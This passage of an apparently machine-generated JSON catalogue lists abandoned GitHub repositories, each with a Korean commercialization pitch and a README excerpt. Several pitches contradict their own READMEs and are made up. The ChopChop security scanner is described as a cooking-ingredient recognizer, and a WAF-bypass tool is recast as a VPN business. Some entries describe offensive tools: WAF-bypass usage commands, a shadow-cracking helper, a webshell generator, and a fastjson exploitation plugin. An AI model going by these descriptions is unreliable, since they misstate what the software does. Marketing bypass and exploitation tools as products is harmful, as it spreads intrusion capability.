VQ-Diffusion (CVPR2022, Oral) and <br> Improved VQ-Diffusion\r\n\r\n## Overview\r\n\r\nThis is the official repo for the paper: [Vector Quantized Diffusion Model for Text-to-Image Synthesis](https://arxiv.org/pdf/2111.14822.pdf) and [Improved Vector Quantized Diffusion Models](https://arxiv.org/pdf/2205.16007.pdf).\r\n\r\nThe code is the same as https://github.com/cientgu/VQ-Diffusion, some issues that have been raised can refer to it.\r\n\r\n> VQ-Diffusion is based on a VQ-VAE whose latent space is modeled by a conditional variant of the recently developed Denoising Diffusion Probabilistic Model (DDPM). It produces significantly better text-to-image generation results when compared with Autoregressive models with similar numbers of parameters. Compared with previous GAN-based methods, VQ-Diffusion can handle more complex scenes and improve the synthesized image quality by a large margin.\r\n\r\n## Framework\r\n\r\n<img src='figures/framework.png' width='600'>\r\n\r\n## Integration with 🤗 Diffusers library\r\n\r\nV","composite_score":0.5032,"license_safety_tag":"safe"},{"name":"ZeroSimple/Pixel-2016-Permissions","github_url":"https://github.com/ZeroSimple/Pixel-2016-Permissions","stars":60,"language":"Shell","license":"unknown","abandonment_months":61,"description":"# Pixel-2016-Permissions 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱이 사용자 정보(위치, 연락처, 사진 등)에 접근하는 것을 안전하게 통제하는 기술로, 개인정보 보호 규제가 강화되는 시대에 수요가 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 모바일 앱 관리 SaaS**: 회사가 직원 스마트폰의 앱 권한을 일괄 관리하고","readme_excerpt":"# Pixel (2016) Permissions - Magisk Module\n\n## Description\nGet all the special features of Google Pixel (2016) on a general Android device. \n\n## Requirements\n -[Magisk](https://github.com/topjohnwu/Magisk) installed\n\n -Any ROM\n\nThis module may not run on the latest Pixel phones with stock ROM or other phones with Pixel Experience ROM. \n\n## Instructions\nFlash the module in Magisk Manager first. After reboot, you need reset Google Photos to see the change.\n\n## Releases & Changelog\nDownload the module from [releases page](https://github.com/ZeroSimple/Pixel-2016-Permissions/releases/tag/v1.0). \n\n\n### Release v1.0\n\n -The first version. \n\n\n## F&Q\n\nWhy is my phone recognized as a Pixel, but my backup photos are still taking up space on my Google Drive?\n\nFor some unknown reason, the module is not working perfectly on some phones. After some users tested it, Google Photos will tell you that it has suspended backups because your Google Drive space was full, but it can still continue to backup a","composite_score":0.5032,"license_safety_tag":"unknown"},{"name":"michelin/ChopChop","github_url":"https://github.com/michelin/ChopChop","stars":6,"language":"Go","license":"NOASSERTION","abandonment_months":32,"description":"# ChopChop 저장소 분석\n\n## 왜 보물인가\n요리 재료를 자동으로 인식하고 정리해주는 기술로, 음식 관련 비즈니스의 재고 관리를 혁신할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음식 배달 앱**: 음식점의 재료 자동 인식으로 주문 가능 메뉴를 실시간 업데이트하는 SaaS 서비스\n2. **식재료 유통사 내부 도구**: 창고에서 들어오는 재료를","readme_excerpt":"<p align=\"center\"><img src=\"/docs/img/chopchop_logo.png\" width=\"180\" height=\"150\"/></p>\r\n\r\n[![Build Status](https://github.com/michelin/ChopChop/workflows/Build%20ChopChop/badge.svg)](https://github.com/michelin/ChopChop/actions)\r\n[![License](https://img.shields.io/badge/license-Apache-green.svg)](https://opensource.org/licenses/Apache-2.0)\r\n[![Go Report Card](https://goreportcard.com/badge/github.com/michelin/ChopChop)](https://goreportcard.com/report/github.com/michelin/ChopChop)\r\n\r\n# ChopChop\r\n\r\n**ChopChop** is a command-line tool for dynamic application security testing on web applications, initially written by the Michelin CERT.\r\n\r\nIts goal is to scan several endpoints and identify exposition of services/files/folders through the webroot.\r\nChecks/Signatures are declared in a config file (by default: `chopchop.yml`), fully configurable, and especially by developers.\r\n\r\n<p align=\"center\"><img src=\"/docs/img/demo.gif?raw=true\"/></p>\r\n\r\n> \"Chop chop\" is a phrase rooted in Cantonese. \"","composite_score":0.5032,"license_safety_tag":"unknown"},{"name":"atom/teletype-crdt","github_url":"https://github.com/atom/teletype-crdt","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# atom/teletype-crdt 평가 보고서\n\n## 왜 보물인가\n여러 사람이 동시에 같은 문서를 수정할 때 충돌 없이 모두의 변경사항이 자동으로 반영되는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 협업 문서 편집 SaaS**\n구글 독스처럼 팀원이 함께 실시간으로 문서·코드를 작성하는 서비스에 탑재 가능합니다.\n\n**2. 개발팀 내부 도구*","readme_excerpt":"##### Atom and all repositories under Atom will be archived on December 15, 2022. Learn more in our [official announcement](https://github.blog/2022-06-08-sunsetting-atom/)\n # teletype-crdt\n\nThe string-wise sequence CRDT powering peer-to-peer collaborative editing in [Teletype for Atom](https://github.com/atom/teletype).\n\n## Hacking\n\nAfter cloning this repository, you can install its dependencies by running:\n\n```\nnpm install\n```\n\nAnd then run tests via:\n\n```\nnpm test\n```\n\n## Background\n\nFor more details on the techniques used for this data structure, we recommend reading the following papers:\n\n* [Data consistency for P2P Collaborative Editing](https://doi.org/10.1145/1180875.1180916)\n* [Supporting String-Wise Operations and Selective Undo for Peer-to-Peer Group Editing](https://doi.org/10.1145/2660398.2660401)\n* [High Responsiveness for Group Editing CRDTs](https://doi.org/10.1145/2957276.2957300)\n\n## TODO\n\n* [ ] Document APIs\n","composite_score":0.5032,"license_safety_tag":"safe"},{"name":"zjunlp/OpenUE","github_url":"https://github.com/zjunlp/OpenUE","stars":43,"language":"Python","license":"MIT","abandonment_months":45,"description":"# OpenUE 상용화 분석 보고서\n\n## 왜 보물인가\n문서나 텍스트에서 중요한 정보(사람, 조직, 장소 등)를 자동으로 찾아내는 기술로, 정보 검색과 데이터 정리 업무를 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **채용 공고 자동 분류 SaaS**: 수천 개의 채용 공고에서 직급, 회사명, 필요 기술을 자동 추출하여 구직자에게 맞춤 제","readme_excerpt":"[**中文说明**](https://github.com/zjunlp/OpenUE/blob/main/README.md) | [**English**](https://github.com/zjunlp/OpenUE/blob/main/README_EN.md)\n<p align=\"center\">\n    <a href=\"https://github.com/zjunlp/openue\"> <img src=\"https://github.com/zjunlp/OpenUE/blob/main/imgs/logo.png\" width=\"400\"/></a>\n</p>\n\n<p align=\"center\">\n<strong> OpenUE is a lightweight toolkit for knowledge graph extraction. \n    </strong>\n</p>\n    <p align=\"center\">\n    <a href=\"https://badge.fury.io/py/openue\">\n        <img src=\"https://badge.fury.io/py/openue.svg\">\n    </a>\n    <a href=\"https://github.com/zjunlp/OpenUE/blob/main/LICENSE\">\n        <img alt=\"GitHub\" src=\"https://img.shields.io/github/license/zjunlp/openue.svg?color=green\">\n    </a>\n        <a href=\"http://openue.zjukg.org\">\n        <img alt=\"Documentation\" src=\"https://img.shields.io/website/http/huggingface.co/transformers/index.html.svg?down_color=red&down_message=offline&up_message=online\">\n    </a>\n</p>\n\n[OpenUE](https://aclanthology.org/2020.emnlp-demo","composite_score":0.5032,"license_safety_tag":"safe"},{"name":"ShiftyAxel/Qodot","github_url":"https://github.com/ShiftyAxel/Qodot","stars":15,"language":"GDScript","license":"MIT","abandonment_months":39,"description":"# Qodot 저장소 분석\n\n## 왜 보물인가\n3D 게임 제작 도구(Godot)에서 전문적인 맵 디자인을 쉽게 할 수 있게 만드는 도구로, 게임 개발자들의 작업 시간을 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 SaaS 플랫폼**: 브라우저에서 직접 3D 게임 맵을 만들고 저장할 수 있는 웹 서비스로 운영\n2. **게임 스","readme_excerpt":"![](https://raw.githubusercontent.com/Shfty/qodot-extras/master/graphics/qodot_logo_small.png)\n\nQuake *.map* file support for Godot 3.x. **For the Godot 4.x plugin, see [Qodot 4](https://github.com/QodotPlugin/Qodot/).**\n\n## Documentation\n\nHosted here: [https://qodotplugin.github.io/](https://qodotplugin.github.io/)\n\n## Overview\n\nQodot extends the Godot editor to import Quake *.map* files, and provides a data-driven framework for converting the entities and brushes contained therein into a custom node hierarchy.\n\n![](https://raw.githubusercontent.com/wiki/Shfty/qodot-plugin/images/2-usage/in-editor.gif)\n\n## Features\n\n- Natively import `.map` files into Godot and convert them into a usable scene tree\n- Supports\n  - Brush geometry\n  - Textures and customized UVs\n  - Convex and concave collision volumes\n  - Gameplay entities\n  - FGD (Forge Game Data) export for custom game definitions\n- Configurable scene population\n  - Leverages the map format's classname and key/value property systems\n ","composite_score":0.5032,"license_safety_tag":"safe"},{"name":"sushiswap/bentobox","github_url":"https://github.com/sushiswap/bentobox","stars":9,"language":"","license":"unknown","abandonment_months":44,"description":"# SushiSwap BentoBox 분석 보고서\n\n## 왜 보물인가\n암호화폐 거래소에서 여러 자산을 효율적으로 관리하고 거래할 수 있도록 도와주는 금융 인프라로, 블록체인 금융 시장의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 암호화폐 거래 플랫폼 SaaS**\n여러 암호화폐를 한 곳에서 관리하고 거래하는 웹 서비스로 개인 투자자와 기관에 제공","readme_excerpt":"This has been moved to: [Sushi 2.0](https://github.com/sushiswap/sushiswap/tree/master/protocols/bentobox)","composite_score":0.5032,"license_safety_tag":"unknown"},{"name":"Anish-Agnihotri/dhof-loot","github_url":"https://github.com/Anish-Agnihotri/dhof-loot","stars":13,"language":"JavaScript","license":"Unlicense","abandonment_months":57,"description":"# dhof-loot 저장소 분석\n\n## 왜 보물인가\n온라인 게임이나 디지털 자산에서 획득한 아이템들을 자동으로 분류하고 관리할 수 있는 시스템으로, 수집가나 게임 커뮤니티가 필요로 하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 커뮤니티 SaaS**: 게이머들이 획득한 아이템을 온라인으로 정리하고 친구들과 공유하는 웹 서비스\n2. **게임사 내","readme_excerpt":"<p align=\"center\">\n  <h1 align=\"center\">dhof-loot</h1>\n</p>\n<p align=\"center\">\n<b><a href=\"https://github.com/anish-agnihotri/dhof-loot#About\">About</a></b>\n|\n<b><a href=\"https://github.com/anish-agnihotri/dhof-loot#Derivatives\">Derivatives</a></b>\n|\n<b><a href=\"https://github.com/anish-agnihotri/dhof-loot#License\">License</a></b>\n</p>\n\n# About\n\nThis repository contains tooling and data for [Loot](https://www.lootproject.com/faq) and other derivative projects, and is free to use without credit or attribution, for any means.\n\nThe `/` directory contains scripts and data for Loot, and `/derivatives` contains the same for projects inspired from or built atop Loot.\n\n> Loot itself is a collection of 8,000 unique bags of adventurer gear NFTs. At release, anyone could claim loot bags for just gas, and all bags were claimed in under 4 hours. Each loot bag contains 8 items: a piece for an adventurer's chest, foot, hand, head, neck, ring, waist, and weapon.\n\n# Loot\n\n## Distribution\n\n- tokenIds `1","composite_score":0.5032,"license_safety_tag":"unknown"},{"name":"nft-fun/generate-bitbirds","github_url":"https://github.com/nft-fun/generate-bitbirds","stars":6,"language":"Python","license":"MIT","abandonment_months":42,"description":"# NFT Fun - Generate Bitbirds 분석\n\n## 왜 보물인가\n누구나 독특한 디지털 수집품(NFT)을 자동으로 만들 수 있는 도구로, 창작자와 수집가 모두에게 필요한 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **NFT 생성 플랫폼 SaaS**: 일반인도 클릭만으로 자신만의 NFT를 만들고 판매할 수 있는 웹 서비스\n2. **게임사 내부 ","readme_excerpt":"# NFTBirds generation script\n# Intro\nThis is published under MIT license, which means you can do whatever you want with it - entirely at your own risk.\n\nPlease don't be an asshole. This is, like, grassroots and stuff. \n\nSpecifically I'm asking you in good faith not to directly knock off the NFTBirds project, or otherwise screw me over for sharing this. Do not use this for anything hateful or discriminatory.\n\nThere is a YouTube video walkthrough to complement this ReadMe [...Link...](https://youtu.be/vTxjLLHncMo).\n\n# Setting the expectations\nIf you're new to programming you may struggle to set up the dependencies. If you're persistent, you can do it! I believe in you. \n\nOften in technology, setting up a pre-requisite like PIP (a python asset installation tool) isn't something the developer thinks about in a given project because it has been on their computer for months or years. \n\nEven having set up a number of dependencies just a few weeks ago for this project, I don't remember exactly","composite_score":0.5032,"license_safety_tag":"safe"},{"name":"JDFED/drip-form","github_url":"https://github.com/JDFED/drip-form","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":35,"description":"# JDFED/drip-form 분석 리포트\n\n## 왜 보물인가\n복잡한 설문지나 신청서를 코드 없이 직접 만들 수 있는 도구로, 비개발자도 쉽게 업무용 폼을 구성할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 만족도 조사, 설문조사 플랫폼으로 제공\n- **내부 업무 도구**: 기업의 입사지원, 휴가신청, 결재 양식을 자동화\n-","readme_excerpt":"<a href='http://drip.jd.com/drip-form/index.html'>\n\n<h1 style=\"display: flex; align-items: center; justify-content: center\">\n  <img src='https://storage.360buyimg.com/imgtools/7e0e546a96-d962c880-f9a2-11eb-bf08-d585041b7c80.svg'/>\n  <span style=\"margin-left: 10px\">Drip-Form</span>\n</h1>\n</a>\n\n简体中文 | [English](./README.EN.md) | [官方文档](https://jdfed.github.io/drip-form/) | [讨论组](https://github.com/JDFED/drip-form/discussions)\n\n<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[contributors]: https://img.shields.io/badge/all_contributors-13-orange.svg?style=flat-square 'Number of contributors on All-Contributors'\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n\n![Version](https://img.shields.io/badge/version-1.0.0-blue.svg?cacheSeconds=2592000)\n![node](https://img.shields.io/badge/node-%3E%3D13.14.0-blue.svg)\n![yarn](https://img.shields.io/badge/yarn-%3E%3D1.0.0-blue.svg)\n![document](https://img.shields.io/badge/documentation-yes-brightgreen.svg)\n![License: MIT](https://img","composite_score":0.5031,"license_safety_tag":"safe"},{"name":"artdothaus/artdothaus","github_url":"https://github.com/artdothaus/artdothaus","stars":8,"language":"","license":"unknown","abandonment_months":58,"description":"# artdothaus 저장소 분석\n\n## 왜 보물인가\n미술 작품 관리와 갤러리 운영을 디지털화할 수 있는 플랫폼으로, 오프라인 미술계를 온라인으로 연결하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **미술관/갤러리 관리 SaaS**: 작품 재고, 전시회 일정, 판매 기록을 한 곳에서 관리하는 클라우드 서비스\n2. **미술 거래 플랫폼**: 작가와 수집","readme_excerpt":"<h2 align=\"center\">\n  <a href=\"https://github.com/DenverCoder1/readme-typing-svg\"><img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome%20to%20ART%20HAUS;ART%20HAUS%20meets%20CODE%20HAUS;%20We%20building;the%20next%20generation;art%20market&font=Fira%20Code&center=true&width=440&height=45&vCenter=true&size=22\"></a>\n</h2>\n\n<!-- Social icons section -->\n<p align=\"center\">\n  <a href=\"https://twitter.com/artdothaus\"><img width=\"30%\" alt=\"Twitter\" title=\"Twitter\" src=\"https://i.imgur.com/P4RT3DM.gif\"/></a>\n  &#8287;&#8287;&#8287;&#8287;&#8287;\n</p>\n\n<br/>\nART HAUS is an artist residency for the metaverse where NFT collectors can become keyholders and unlock privileged access to members-only exclusives. \n\nOur team is a collective of insanely passionate collectors, creators, and developers. But most importantly, we are curators.\n\n<h3>What we do</h3>\nWe operate in unison with our curation protocol through which our process for artist discovery is augmented by AI-driven recommendatio","composite_score":0.5031,"license_safety_tag":"unknown"},{"name":"auxten/go-sqldb","github_url":"https://github.com/auxten/go-sqldb","stars":7,"language":"Go","license":"Apache-2.0","abandonment_months":58,"description":"# go-sqldb 상용화 분석\n\n## 왜 보물인가\nGo 언어로 만든 데이터베이스 연결 도구로, 복잡한 데이터베이스 작업을 간단하게 해주는 유용한 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업용 회계 소프트웨어에서 고객의 판매 기록, 거래처 정보 등을 빠르게 저장하고 검색할 때 활용\n2. **내부 업무 도구**: 대","readme_excerpt":"# Go SQL DB\n\n[中文](README-zh.md)\n\n\"Go SQL DB\" is a relational database that supports SQL queries for research purposes. The main goal is to show the basic principles and key design of a relational database to database enthusiasts. Therefore, to easily understand, a lot of tricks but not very rigorous design was adopted, and the amount of code was controlled at about 2000 lines (including 400 lines of unit tests).\n\n## Features\n\n1. Pure Golang implementation, does not rely on any third-party packages. Goconvey was only introduced in unit tests\n1. Unit test coverage ≈ 73.5%\n\n#### Storage Engine\n1. Special Thanks to [Let's Build a Simple Database](https://cstack.github.io/db_tutorial/)\n1. Data retrieval structure based on B+Tree\n1. Disk persistence engine based on 4KB paging\n1. Close to POD (Plain Old Data) speed serialization & deserialization\n\n#### SQL Parser\n1. Tokenizer is implemented based on text/scanner\n1. Support simple SELECT, INSERT syntax\n   1. SELECT supports WHERE of numeric ty","composite_score":0.5031,"license_safety_tag":"safe"},{"name":"gonzalonunez/Skeleton","github_url":"https://github.com/gonzalonunez/Skeleton","stars":5,"language":"Swift","license":"MIT","abandonment_months":57,"description":"# Skeleton 저장소 분석\n\n## 왜 보물인가\n앱 개발할 때 처음부터 필요한 기본 구조를 미리 만들어 둔 것으로, 개발자들의 반복적인 작업을 크게 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 새로운 앱 기반 구독 서비스를 빠르게 출시해야 하는 스타트업들에게 개발 기간을 3-6개월 단축하는 템플릿으로 판매\n- **내부 업","readme_excerpt":"<p align=\"center\">\n    <img src=\"logo.png\" width=\"300\" max-width=\"50%\" alt=\"Skeleton\" />\n</p>\n\n\n<p align=\"center\">\n    <a href=\"https://developer.apple.com/swift\">\n        <img src=\"https://img.shields.io/badge/swift-5.0-red.svg?style=flat\" />\n    </a>\n    <a href=\"https://cocoapods.org/pods/Skeleton\">\n        <img src=\"https://img.shields.io/cocoapods/v/Skeleton.svg?style=flat\" />\n    </a>\n    <a href=\"https://github.com/Carthage/Carthage\">\n        <img src=\"https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat\" />\n    </a>\n    <a href=\"https://opensource.org/licenses/MIT\">\n        <img src=\"https://img.shields.io/badge/license-MIT-lightgrey.svg?style=flat\" />\n    </a>\n    <a href=\"http://www.gonzalonunez.me/Skeleton/\">\n        <img src=\"https://img.shields.io/cocoapods/p/Skeleton.svg?style=flat\" />\n    </a>\n</p>\n\nSkeleton is an easy way to create sliding `CAGradientLayer` animations! It works great for creating skeleton screens:\n\n<img src=\"https://github.com/gonzalon","composite_score":0.5031,"license_safety_tag":"safe"},{"name":"HoangTran0410/RevealDeletedFBMessages","github_url":"https://github.com/HoangTran0410/RevealDeletedFBMessages","stars":18,"language":"JavaScript","license":"unknown","abandonment_months":32,"description":"# RevealDeletedFBMessages 사업화 분석\n\n## 왜 보물인가\n페이스북에서 삭제한 메시지를 복구할 수 있는 기술로, 개인의 중요한 대화 내용을 되살릴 수 있다는 점에서 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인용 웹 서비스**: 사용자가 자신의 페이스북 계정을 연결하면 삭제된 메시지를 자동으로 복구해주는 온라인 도구\n2. *","readme_excerpt":"# Reveal Deleted FB Messages\n\nDonate? Muốn hỗ trợ mình 1 ly cafe <3 [Donate here](https://github.com/HoangTran0410/HoangTran0410/blob/main/DONATE.md)\n\n## [MỚI] Cài đặt ngay từ [Chrome Webstore](https://chrome.google.com/webstore/detail/reveal-deleted-fb-message/oddpcajnaolfbinffajkacjhohhahlib/related?hl=vi&authuser=1)\n\n![normal](./screenshots/webstore.jpg)\n\nMột extension nho nhỏ, giúp mọi người xem lại những tin nhắn đã bị đối phương xóa trong fb messenger.\n\n- [Post hướng dẫn tạo Extension này](https://www.facebook.com/groups/j2team.community/posts/1650103925321721/)\n\n- [Post giới thiệu v2](https://www.facebook.com/groups/j2team.community/posts/1651683238497123/)\n\n*Ý tưởng và Tham khảo code từ [KB2A Tool](https://kb2atool.com/)*\n\n## Cài đặt\n\n**Cập nhật**:\nExtension đã có trên webstore, vào link và cài trực tiếp nhé: [Chrome WebStore](https://chrome.google.com/webstore/detail/reveal-deleted-fb-message/oddpcajnaolfbinffajkacjhohhahlib/related?hl=vi&authuser=1)\n\nHoặc các bạn có thể cài đ","composite_score":0.5031,"license_safety_tag":"unknown"},{"name":"LandGrey/abuse-ssl-bypass-waf","github_url":"https://github.com/LandGrey/abuse-ssl-bypass-waf","stars":10,"language":"Python","license":"unknown","abandonment_months":59,"description":"# LandGrey/abuse-ssl-bypass-waf 분석\n\n## 왜 보물인가\n보안 시스템을 우회하는 기술로, 웹사이트 차단을 피하려는 많은 조직과 개인들이 필요로 하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 점검 서비스**: 기업의 방화벽이 제대로 작동하는지 테스트하는 보안 컨설팅 회사\n2. **VPN/프록시 서비스**: 검열된 국가에서","readme_excerpt":"# abuse-ssl-bypass-waf\n\n**Helping you find the SSL/TLS Cipher that WAF cannot decrypt and Server can decrypt same time**\n\n\n\nReferer article: [Bypassing Web-Application Firewalls by abusing SSL/TLS](https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html)\n\n\n\n#### Idea\n\n![](pictures/mind.png)\n\n\n\n#### Usage\n\n`python abuse-ssl-bypass-waf.py --help`\n\n\n\nIf you can find keyword or regex when hit the WAF page, you can use:\n\n`python abuse-ssl-bypass-waf.py -regex \"regex\" -target https://target.com`\n\nor you cannot find keyword or regex when filter by WAF,you can use:\n\n`python abuse-ssl-bypass-waf.py -thread 4 -target https://target.com`\n\n\n\n**Notice**: If you are worry about WAF drop the connection, you have better not use `-thread` option.\n\n\n\n#### Thirdparty\n\n**curl**\n\n**sslcan**\n\n**Notice**: If your operation system is not Windows, you should be modify `config.py` ，adjust `curl`  and `sslscan` path & command values.\n\n\n\n#### Running\n\n**If you don't know what the t","composite_score":0.5031,"license_safety_tag":"unknown"},{"name":"httpvoid/CVE-Reverse","github_url":"https://github.com/httpvoid/CVE-Reverse","stars":7,"language":"Python","license":"unknown","abandonment_months":55,"description":"# CVE-Reverse 상용화 분석\n\n## 왜 보물인가\n컴퓨터 보안 취약점을 자동으로 분석하고 추적하는 도구로, 기업의 보안팀이 신속하게 위협을 파악하고 대응할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 보안 모니터링 SaaS**\n- 기업들이 월 구독으로 자신의 시스템 취약점을 지속적으로 감시하고 보고서를 받는 서비스\n\n**2. 내부 보안팀","readme_excerpt":"Reverse N Days!!! \nJust to keep track of all the CVE we find & reverse, should have done it way earlier xD.\n","composite_score":0.5031,"license_safety_tag":"unknown"},{"name":"c0ny1/WorkScripts","github_url":"https://github.com/c0ny1/WorkScripts","stars":5,"language":"Python","license":"unknown","abandonment_months":85,"description":"# WorkScripts 저장소 분석\n\n## 왜 보물인가\n업무 자동화에 필요한 실용적인 스크립트 모음으로, 반복되는 일상 업무를 빠르게 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 직원들을 위한 월간 구독형 업무 자동화 도구로 제공\n2. **내부 업무 도구**: 대기업의 HR·회계·운영 부서에서 수작업 업무를","readme_excerpt":"# 脚本列表\r\n\r\n|序号|脚本名称|描述|\r\n|:---:|:---|:---|\r\n|1|[crack-shadow-helper](crack-shadow-helper/)|批量破解shadow辅助小脚本|\r\n|2|[masscan-report-converter](masscan-report-converter/)|将masscan报告转为xls格式|\r\n|3|[get-subdomain-from-baidu](get-subdomain-from-baidu/)|基于百度云观测接口获取子域名|\r\n|4|[shadowProxy-update-proxy-list](shadowProxy-update-proxy-list/)|借助[proxylist](https://github.com/fate0/proxylist)项目给[shadowProxy](https://github.com/odboy/shadowProxy)项目更新代理ip列表的脚本|\r\n|5|[生成利用随机异或绕waf的webshell脚本](get-subdomain-from-baidu/)|利用随机异或绕waf|","composite_score":0.5031,"license_safety_tag":"unknown"},{"name":"MQZHot/ZCycleView","github_url":"https://github.com/MQZHot/ZCycleView","stars":18,"language":"Swift","license":"MIT","abandonment_months":59,"description":"# ZCycleView 프로젝트 분석\n\n## 왜 보물인가\n모바일 앱에서 사진을 돌려보며 넘기는 기능을 간단하게 만들 수 있는 기초 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **사진 갤러리 앱**: 사용자가 손가락으로 원을 그리듯 사진을 넘기는 독특한 경험 제공\n2. **전자상거래 앱**: 상품 이미지를 동적으로 표시하여 고객의 상품 확인 편의성 향상\n","readme_excerpt":"# ZCycleView\n\n使用`UICollectionView`实现常见图片轮播，支持自定义pageControl，自定义Cell\n\n![](https://img.shields.io/badge/support-swift%205%2B-green.svg)  ![](https://img.shields.io/badge/support-iOS%209%2B-blue.svg)  ![](https://img.shields.io/cocoapods/v/ZCycleView.svg?style=flat)\n\n<img src=\"https://github.com/MQZHot/ZCycleView/raw/master/Picture/picture.gif\">\n\n## 使用方法\n\n```swift\nlet cycleView = ZCycleView()\ncycleView.delegate = self\ncycleView.reloadItemsCount(images.count)\ncycleView.itemSpacing = 10\ncycleView.itemSize = CGSize(width: width - 150, height: (width - 150) / 2.3333)\ncycleView.initialIndex = 1\nview.addSubview(cycleView)\n```\n\n#### 代理方法\n\n```swift\nprotocol ZCycleViewProtocol: class {\n    /// 注册cell，[重用标志符：cell类]\n    func cycleViewRegisterCellClasses() -> [String: AnyClass]\n    /// 配置cell\n    func cycleViewConfigureCell(collectionView: UICollectionView, cellForItemAt indexPath: IndexPath, realIndex: Int) -> UICollectionViewCell\n    /// 开始拖拽\n    func cycleViewBeginDragingIndex(_ cycleView: ZCycleV","composite_score":0.5031,"license_safety_tag":"safe"},{"name":"rocketseat-content/youtube-next-auth-jwt","github_url":"https://github.com/rocketseat-content/youtube-next-auth-jwt","stars":7,"language":"TypeScript","license":"unknown","abandonment_months":61,"description":"# rocketseat-content/youtube-next-auth-jwt 분석\n\n## 왜 보물인가\n웹사이트에 로그인 기능을 안전하게 구현하는 방법을 실제 코드로 보여주는 교육용 자료로, 중소 스타트업들이 보안 문제 없이 회원 관리 시스템을 구축할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 업무 관리 앱이나 클라우","readme_excerpt":"","composite_score":0.5031,"license_safety_tag":"unknown"},{"name":"zilong3033/fastjsonScan","github_url":"https://github.com/zilong3033/fastjsonScan","stars":5,"language":"","license":"unknown","abandonment_months":61,"description":"# fastjsonScan 저장소 분석\n\n## 왜 보물인가\n웹 서비스에서 가장 흔하게 발생하는 보안 취약점(FastJSON 관련 공격)을 자동으로 찾아주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 웹 애플리케이션 보안 검사를 자동화하는 온라인 진단 플랫폼\n2. **내부 업무 도구**: 소프트웨어 개발 회사가 자체 서비스 ","readme_excerpt":"#### 更新了，注意升级！！更新到v3.9\n 支持fastjson<=1.2.24和1.2.33<=fatjson<=1.2.47的不出网检测方案！！！！其中有SpringEcho方案,TomcatEcho方案，有DelayTest方案。不出网利用链有3条:dbcp,ibatis和TemplatesImpl，其中TemplatesImpl几乎遇不到，但是也加着。加入回显的文件上传功能（文件大小<64KB），内存马未实现后续添加。新增操作界面和菜单send to fastjsonScan\n\n## fastjsonScan\nfastjson漏洞burp插件，检测fastjson&lt;=1.2.47基于dnslog和fastjson 1.2.47 的不出网3种TomcatEcho,SpringEcho回显方案，使用ysoserial的tomcatEcho回显方案\n\n附带fastjson1.2.47.tar.gz的web，解压到tomcat 的webapps，和fastjson 1.2.24的jar包，替换1.2.47的jar就能测试1.2.24。\n\n\n   \n#### FastjsonScan 更新\n 1. 在原来的被动扫描上支持主动扫描，由于主动扫描发送数据包较多，故会多次扫描。\n 2. 在原来的rmi协议上支持ldap协议。\n 3. 支持fastjson<=1.2.24和1.2.33<=fatjson<=1.2.47回显 ,检测后，发送到Repeater 中，便可以利用。\n 4. 支持fastjson<=1.2.24和1.2.33<=fatjson<=1.2.47的延时检测。\n 5. 支持fastjson<=1.2.68 的DNSlog检测。\n  ##### 4. 存在攻击行为，非法使用后果自负！！！！\n 5. 为防止被动检测多次扫描，同一url被动检测一次，如果重新检测，需要重新加载插件或重启burp，主动扫描可以检测多次，目前主动扫描不会tomcatEcho和SpringEcho。\n ##### 6. 加入1.2.47-1.2.68 dnslog检测方案，高于1.2.47的利用条件苛刻。\n \n#### 用法：\n  加到burp插件就行了，流量经过burp就检测。结果在ISSUES中看到，如果fastjson<=1.2.24和1.2.33<=fatjson<=1","composite_score":0.503,"license_safety_tag":"unknown"},{"name":"Mixiaoxiao/ESP8266-IR-HOMEKIT","github_url":"https://github.com/Mixiaoxiao/ESP8266-IR-HOMEKIT","stars":30,"language":"","license":"MIT","abandonment_months":63,"description":"# ESP8266-IR-HOMEKIT 프로젝트 분석\n\n## 왜 보물인가\n저렴한 IoT 칩을 이용해 집의 리모컨을 스마트폰으로 제어할 수 있는 DIY 스마트홈 시스템으로, 기술 진입장벽이 낮으면서도 실용적인 가치가 높습니다.\n\n## 어디에 쓸 수 있나\n\n1. **스마트홈 통합 플랫폼**: 기존 리모컨 기기들을 앱 하나로 관리하는 IoT 통합 서비스\n2. **","readme_excerpt":"# ESP8266-IR-HOMEKIT\n\n## 原生HomeKit红外空调遥控\n\n![HomeKit](https://raw.github.com/Mixiaoxiao/ESP8266-IR-HOMEKIT/master/image/home_app_pages.png) \n\n主芯片为ESP8266，原生HomeKit红外空调遥控，支持数十种空调遥控协议。\n\n现阶段为体验版固件，在`firmware`文件夹中提供固件下载。\n\n目前仍在开发中，部分功能以后可能会有改动。\n\n注：空调，Air Conditioner，简写为AC\n\n## 主要功能\n\n- 原生HomeKit协议，无需服务器桥接，基于我的[Arduino-HomeKit-ESP8266](https://github.com/Mixiaoxiao/Arduino-HomeKit-ESP8266)\n- 支持控制空调的开关、模式、温度、风速、扫风、灯光\n- 